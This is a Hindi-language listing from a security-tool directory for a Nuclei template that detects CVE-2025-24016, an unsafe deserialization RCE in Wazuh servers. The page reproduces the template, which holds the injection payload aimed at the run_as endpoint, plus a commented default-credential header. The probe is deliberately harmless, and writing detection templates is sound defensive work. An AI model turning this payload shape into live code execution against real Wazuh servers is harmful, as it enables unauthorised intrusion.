Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/huseyinstif/cve-2025-24016-nuclei-template
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhuseyinstif/cve-2025-24016-nuclei-template

CVE-2025-24016-Nuclei-Template

Wazuh सर्वरों में CVE-2025-24016 असुरक्षित डीसेरिएलाइज़ेशन RCE का पता लगाने के लिए Nuclei टेम्पलेट, एक क्राफ्टेड JSON पेलोड के माध्यम से जो NameError ट्रिगर करता है।

रिपॉजिटरी देखें
4131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24016 Wazuh असुरक्षित डिसीरियलाइज़ेशन RCE का पता लगाना

इस रिपॉज़िटरी में Wazuh सर्वरों में असुरक्षित डिसीरियलाइज़ेशन भेद्यता का पता लगाने के लिए एक Nuclei टेम्पलेट है, जिसे CVE-2025-24016 के रूप में पहचाना गया है।

टेम्पलेट विवरण

root@kitploit:~
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"

उपयोग

root@kitploit:~
nuclei -t CVE-2025-24016.yaml -u http://example.com

संपर्क

किसी भी प्रश्न या अधिक जानकारी के लिए, आप मुझसे संपर्क कर सकते हैं:

  • LinkedIn
  • Twitter
टूल डाउनलोड करें